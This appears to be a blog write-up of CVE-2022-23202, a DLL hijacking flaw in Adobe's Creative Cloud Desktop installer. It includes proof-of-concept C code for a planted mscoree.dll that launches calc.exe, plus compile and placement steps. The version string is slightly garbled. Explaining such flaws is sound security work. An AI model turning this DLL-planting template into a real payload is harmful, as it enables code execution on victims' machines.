In early 2022, a security vulnerability tagged as CVE-2022-23202 was found in Adobe Creative Cloud Desktop Application (version 2.7..13 and earlier). This weakness is officially called an "Uncontrolled Search Path Element" vulnerability––often related to DLL hijacking. This article breaks down what happened, how the bug works, provides working code snippets, and explains how an attacker could try to exploit it.
> Note: This write-up is original and based on public research, with links to official advisories and trusted security resources.
The Official Description
Adobe's own security bulletin states:
> “Adobe Creative Cloud Desktop application (version 2.7..13 and earlier) is affected by an Uncontrolled Search Path Element vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.”
Translation: What Does It Really Mean?
Put simply, the application looks for certain system files (DLLs) in places it shouldn't. If it finds a malicious DLL in the same folder as one of its executables (like the installer), it will load and run the attacker's code instead of the Microsoft or Adobe DLL it was expecting.
Here’s the simplified overview
1. Attack Preparation: An attacker crafts a malicious DLL file, named exactly like a legitimate system DLL (for example, mscoree.dll).
2. Victim Interaction: The attacker has to trick a user into placing this malicious DLL in the same folder as the Creative Cloud Desktop installer (CreativeCloudSet-Up.exe or similar)––this could be via a ZIP archive or compromised download.
3. Execution: When the user runs the installer, it picks up the malicious DLL instead of the real system one, and executes code the attacker controls––with the user's own permissions.
This means the vulnerability is not easy to exploit at scale; it needs a user to help (by downloading, extracting, or copying files as intended by the attacker). That's why the attack is classed as "high complexity."
Proof of Concept (PoC): Crafting a Malicious DLL
Let’s walk through a minimal code example that shows how an attacker might create a malicious DLL for this vulnerability.
Create a new file, name it mscoree.c (or whichever DLL the installer tries to load)
// mscoree.c - Malicious DLL for Adobe CC hijack
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
MessageBoxA(NULL, "Hacked by DLL Hijack!", "CVE-2022-23202 PoC", MB_OK);
// Launch further payloads, e.g. system("calc.exe"); for demonstration
system("calc.exe");
break;
}
return TRUE;
}
Compile this to a DLL (using Visual Studio Command Prompt)
cl /LD mscoree.c /Fe:mscoree.dll
Step 2: Setup
- Place the compiled mscoree.dll in the same folder as the Creative Cloud Desktop installer (e.g., CreativeCloudSet-Up.exe).
Step 3: Trigger
- When the victim runs CreativeCloudSet-Up.exe, the application will look for mscoree.dll in its directory.
Mitigation & Fix
Adobe fixed this bug in newer versions of Creative Cloud Desktop.
Resources & References
- Adobe Security Bulletin APSB22-10 (Original Advisory)
- NIST National Vulnerability Database Entry for CVE-2022-23202
- What is DLL Hijacking? – BeyondTrust Blog
Final Thoughts
DLL hijacking vulnerabilities like CVE-2022-23202 show why search path control is so critical in software security. While this bug is tricky to exploit, it shows how attackers think and how even trusted applications can be abused under the right circumstances.
Stay safe: keep your software up to date, and be careful about weird installer bundles.
*If you want more in-depth posts on vulnerabilites, drop your topic below!*
Timeline
Published on: 02/16/2022 17:15:00 UTC
Last modified on: 02/24/2022 16:05:00 UTC